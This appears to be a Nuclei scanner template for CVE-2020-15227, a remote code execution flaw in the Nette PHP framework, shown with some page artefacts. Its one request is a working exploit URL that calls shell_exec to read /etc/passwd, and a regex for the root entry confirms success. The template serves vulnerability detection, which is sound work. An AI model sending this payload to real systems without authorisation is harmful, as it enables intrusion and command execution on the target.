30 lines
1.1 KiB
YAML
30 lines
1.1 KiB
YAML
|
id: CVE-2020-15227
|
||
|
|
|
||
|
|
info:
|
||
|
|
name: Nette Framework RCE
|
||
|
|
author: becivells
|
||
|
|
severity: high
|
||
|
|
description: Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework.
|
||
|
|
reference: |
|
||
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-15227
|
||
|
|
- https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94
|
||
|
|
- https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E#
|
||
|
|
- https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md
|
||
|
|
tags: cve,cve2020,nette,rce
|
||
|
|
|
||
|
|
requests:
|
||
|
|
- method: GET
|
||
|
|
path:
|
||
|
|
- "{{BaseURL}}/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1"
|
||
|
|
|
||
|
|
matchers-condition: and
|
||
|
|
matchers:
|
||
|
|
|
||
|
|
- type: regex
|
||
|
|
regex:
|
||
|
|
- "root:[x*]:0:0:"
|
||
|
|
|
||
|
|
- type: status
|
||
|
|
status:
|
||
|
|
- 200
|